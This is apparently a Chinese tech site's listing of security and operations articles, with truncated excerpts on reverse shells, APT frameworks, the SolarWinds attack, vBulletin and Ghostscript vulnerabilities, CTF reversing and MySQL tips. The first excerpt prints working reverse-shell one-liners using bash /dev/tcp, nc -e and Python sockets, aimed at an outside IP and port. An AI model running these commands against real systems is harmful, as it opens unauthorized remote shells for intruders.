-
- 反弹shell有哪些
- 1.bash反弹bash-i>&/dev/tcp/ip_address/port0>&12.nc反弹nc-e/bin/sh192.168.2.13044443.pythonimportsocket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("192.168.2.130",4444))os.dup2(s.fileno(),0)os.dup2(s.
- 安全 . 运维 2406 2023-05-18 22:01:04
-
- NSA新型APT框架DarkPulsar怎么用
- 前言2017年3月,ShadowBrokers放出了一份震惊世界的机密文档,其中包括两个框架:DanderSpritz和FuzzBunch。DanderSpritz完全由插件组成,用于收集情报、利用漏洞和操控已接管的设备。它基于Java编写,提供类似于僵尸网络管理面板的图形界面以及类似Metasploit工具的控制面板。它还整合了用于非FuzzBunch受控设备的后门和插件。DanderSprit界面概述Fuzzbunch为不同的实用程序提供了一个用于交互和协同工作的框架,包含各种类型的插件,其
- 安全 . 运维 1405 2023-05-18 20:14:58
-
- 如何进行Ghostscript SAFER沙箱绕过漏洞的分析
- 前言Ghostscript是一款AdobePostScript语言的解释器软件。可对PostScript语言进行绘图,支持PS与PDF互相转换。目前大多数Linux发行版中都默认安装,并移植到了Unix、MacOS、Windows等平台,且Ghostscript还被ImagineMagic、PythonPIL和各种PDF阅读器等程序所使用。漏洞描述8月21日,Google安全研究员TavisOrmandy披露了多个GhostScript的漏洞,通过在图片中构造恶意PostScript脚本,可以绕
- 安全 . 运维 1656 2023-05-18 19:10:39
-
- DDCTF2019两个逆向分别是什么
- 01Confused首先参考链接https://www.52pojie.cn/forum.php?mod=viewthread&tid=860237&page=1首先分析到这个sub_1000011D0是关键函数是没有什么问题的,直接shift+f12定位DDCTF的字符串就到了这一部分逻辑if((unsignedint)sub_1000011D0(*((__int64*)&v14+1))==1)objc_msgSend(v17,"onSuccess"
- 安全 . 运维 1411 2023-05-18 17:13:20
-
- 绕过限制访问到Google内部管理系统的示例分析
- 蛛丝马迹某天,在挖掘谷歌漏洞的过程中,我从公开的漏洞中发现了一些谷歌自身服务的IP地址,一开始,我真不知道这些IP地址能干嘛。我就先检查了一遍这些IP地址,进一步发现其中包含了一些谷歌的内部IP。我突然想起来,最近,我的朋友KLSREERAM上报过一个谷歌内部IP相关的漏洞,另一个朋友Vishnu则上报过了一个利用谷歌子域名访问到控制面板的漏洞。目前,这两个漏洞都已被谷歌修复,这两个漏洞相关的内部IP地址也不能从互联网上访问到。但是,现在,在我面前就有几个谷歌内部IP地址,我得想办法来看看能不能
- 安全 . 运维 1211 2023-05-18 15:19:49
-
- 如何实现Disk Pulse Eneterprise Window应用程序的漏洞分析
- 一、漏洞简介DiskPulseEneterprise是一款监视磁盘变化的软件,它可以通过一个管理端口9120或者web管理窗口80对软件进行连接管理,从而监视磁盘的变化情况。在DiskPulseEneterprise中有一个动态链接库libspp.dll,其中有一些负责HTTP操作的函数,问题就出现在这个动态链接库中,在处理后数据时,由于对于后数据没有进行严格的长度控制,导致在执行获取后数据时向无效内存拷贝数据造成缓冲区溢出,触发SEH异常行为处理,最后控制EIP,执行任意代码。软件下载链接:h
- 安全 . 运维 1123 2023-05-18 15:04:07
-
- APP崩溃的主要原因是什么
- 一、什么样的场景下容易出现崩溃类问题最近脑子里一直在想什么样的问题容易导致崩溃——那就是具有异常思维,举个例子:正好前两天看了一部美剧叫《菜鸟老警》,里面有个场景是主人公JohnNolan因为没有用警车拦住逃犯的车而导致逃犯出逃,这个场景与测试有什么关联呢?首先正常人在马路上行驶都会躲避避免与别人发生碰撞,这就好比测试功能的主流程,不会去乱点乱输入;但是警察就不一样了,他会为了抓住逃犯不顾一切,想尽一切办法,这就好比测试过程中的异常思维,要思考怎么样操作使功能不好用。宝典一、异常操作各种异常操作
- 安全 . 运维 3194 2023-05-18 13:55:06
-
- MySQL数据库常用技巧有哪些
- 1、如何选择服务器的类型?MySQL服务器配置窗口中各个参数的含义如下。【ServerConfigurationType】该选项用于设置服务器的类型。单击该选项右侧的向下按钮,即可看到包括3个选项。3个选项的具体含义如下:DevelopmentMachine(开发机器):该选项代表典型个人用桌面工作站。假定机器上运行着多个桌面应用程序。将MySQL服务器配置成使用最少的系统资源。ServerMachine(服务器):该选项代表服务器,MySQL服务器可以同其它应用程序一起运行,例如FTP、ema
- 安全 . 运维 1051 2023-05-18 13:29:00
-
- SolarWinds供应链APT攻击事件安全风险的示例分析
- 背景12月13日,美国顶级安全公司FireEye(中文名:火眼)发布报告称,其发现一起全球性入侵活动,命名该组织为UNC2452。该APT组织通过入侵SolarWinds公司,在SolarWindsOrion商业软件更新包中植入恶意代码,进行分发,FireEye称之为SUNBURST恶意软件。该后门包含传输文件、执行文件、分析系统、重启机器和禁用系统服务的能力,从而到达横向移动和数据盗窃的目的。SolarWindsOrionPlatform是一个强大、可扩展的基础架构监视和管理平台,它用于以单个
- 安全 . 运维 1184 2023-05-18 12:52:27
-
- vBulletin 5.x 远程代码执行漏洞的示例分析
- vBulletin组件介绍vBulletin是论坛和社区发布软件的全球领导者。其安全性,强大的管理功能和速度,可为40,000多个在线社区提供服务等特点备受客户青睐。很多大型论坛都选择vBulletin作为自己的社区。从vBulletin官方网站所展示的客户列表可以得知,著名的游戏制作公司EA、著名的游戏平台Steam、日本大型跨国企业Sony、以及美国NASA等均为其客户,vBulletin高效,稳定,安全,在中国也有很多大型客户,比如蜂鸟网,51团购,海洋部落等在线上万人的论坛都用vBull
- 安全 . 运维 1357 2023-05-18 11:46:45
-
- Google在主动攻击下修复Chrome 0-day漏洞的示例分析
- Google25日发布Chrome更新,修复三个安全漏洞,包括一个正遭到主动利用的0-day漏洞。关于这些攻击的详情以及该漏洞是如何被用于攻击Chrome用户的,尚未公开。这些攻击是在2月18日被Google的威胁分析小组成员ClementLecigne发现的。Google威胁分析小组是Google调查和追踪威胁行为体群体的部门。Chrome80.0.3987.122版本修复了该0-day漏洞。Windows,Mac和Linux用户都有可用的更新,但是ChromeOS,iOS和Android用户
- 安全 . 运维 909 2023-05-18 11:25:12
-
- 基于签名算法且简单安全的API授权机制是什么
- 笔者以前在做广告系统时发现对接的大多数平台的广告系统都是以token方式授权接口,而且这个token是一直不变的,由广告主提供,可以说这就是裸奔的接口,只不过这种接口对安全性要求不高,这只能防止恶意调用以及验证渠道的身份。去年笔者写过一个API统一授权平台,为内部服务开放接口给第三方系统调用提供统一的授权管理,除了方便管理接口授权外,没有其它用途,但却要花成本部署。这应该是我做的一个最无意义的项目了。今天介绍的API授权机制或许也是使用较为广泛的一种API接口授权机制,记得笔者以前做微信支付功能
- 安全 . 运维 1466 2023-05-18 10:49:52
-
- idaPro如何分析app解密lua脚本
- 通过前面idaPro调试或hook,我们可以获取到xxtea解密key,对于sign我们可以直接打开原文件:可以看到sign值:byds。所以,我们可以同过xxtea解密工具(可从GitHub上下源码自己编译)试着解密:以index.luac为例,我们看index.luac解密前后变化:我们看到经过xxtea解密后的lua脚本仍然不是明文!我们之前根据cocos2d框架源码及大神apk反编结果确定就是用的xxtea加密,而且app的lua脚本也有签名值,这也印证了就是xxtea加密方式,但是我们
- 安全 . 运维 1923 2023-05-18 08:34:19
-
- 如何进行IP地址分析与应用
- 一、IP地址1、IPV4是由32位二进制数组成2、IP地址由网络位+主机位两个部分组成3、IP地址的分类:类别范围网络位及主机位A1-126网+主+主+主B128-191网+网+主+主C192-223网+网+网+主D224-239组播地址E240-254科学研究二、私网地址A10.0.0.0~10.255.255.255B172,16.0.0~172.31.255.255C192.168.0.0~192.168.255.255三、子网掩码子网掩码用于区分IP地址的网络位和主机位网络位用连续的1表
- 安全 . 运维 2333 2023-05-17 22:55:04
-
- 如何进行越南APT攻击样本的深度分析
- 一、前言APT已经成为了安全领域热门的话题。ElevenPaths旗下Innovaciónylaboratorio4月发表《DoclessVietnamAPT》报告:上述信息表述,我们侦测到一些恶意邮件发送到属于越南政府的邮箱,这封越南语邮件的日期是2019年3月13号。这封邮件可能是来源于越南政府内部,不排除是有人把这封邮件投送到安全部门,因为这封邮件存在可疑因素。TKCTquyInam2019.doc.lnk.malw样本信息如下:图片一:TKCTquyInam2019.doc.lnk.m
- 安全 . 运维 1009 2023-05-17 22:26:37

PHP讨论组
组员:3305人话题:1500
PHP一种被广泛应用的开放源代码的多用途脚本语言,和其他技术相比,php本身开源免费; 可以将程序嵌入于HTML中去执行, 执行效率比完全生成htmL标记的CGI要高许多,它运行在服务器端,消耗的系统资源相当少,具有跨平台强、效率高的特性,而且php支持几乎所有流行的数据库以及操作系统,最重要的是